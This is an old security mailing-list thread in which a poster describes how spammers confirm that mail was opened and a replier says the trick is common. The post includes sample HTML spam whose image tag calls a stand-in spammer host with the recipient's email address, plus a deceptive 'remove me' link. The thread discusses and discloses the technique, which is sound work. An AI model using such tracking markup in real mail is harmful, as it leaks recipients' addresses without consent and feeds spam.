Re: spam technique name?

["Bill Burge" <bill () burge com>]

This is already very common...

Sadly, the place that pays my bills uses this sort of thing in all customer mail.

bb

*********** REPLY SEPARATOR  ***********

On 4/22/2003 at 12:06 PM Calderon, Juan C (CORP, DDEMESIS) wrote:

> Hello all
>
> Recently I was thinking about a technique that could be used by spammers,
> I don't know a common name or something for such a technique, so if you
> know it please let me know.
>
> PROBLEM
>       How can a spammer know if the victim opened the mail?, one is the well
> known "Remove Me" link which, in fact, will confirm user read the message
> (and probably will be bombed with many more, now that he said "hey!, I'm
> here").  However, it requires user interaction.
>
> SOLUTION
>       A simple "solution" can be to insert a Image, Link (for CSS for example)
> or Script tag in the HTML mail, all those elements indicate Web browsers
> to send a GET request using the SRC or HREF attribute, without user
> interaction.
>
> Sample Code (Mail sent to ficticious peter () foomail com)
> <HTML>
> <BODY>
>       Dear Peter<br>
>       Buy our brand new product, CHEAP, CHEAP, CHEAP....
>       <img
> src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom&apos;><br>
>       Click <a href='http://www.spamer.com/ConfirmVictim.php&apos;>Here</a> to be
> removed<br>
>       NOTE:the presence of this link indicates this is not spamming even if you
> don't ask for this email
> </BODY>
> </HTML>
>
> Viewing (or "previewing" in Outlook or similar) this email will
> automatically send a request for a "image" file served by a Server-side
> script, first recording the data without explicit authorization.
>
> I've tested this (using 3 different tags) using Exchange and some others
> public accounts. I have succeed in all cases.
>
> So have you seen something similar? do you think this is a kind of XSS? I
> do.
>
> cheers :)
> ________________________________________
> Juan C Calderon
> IT Security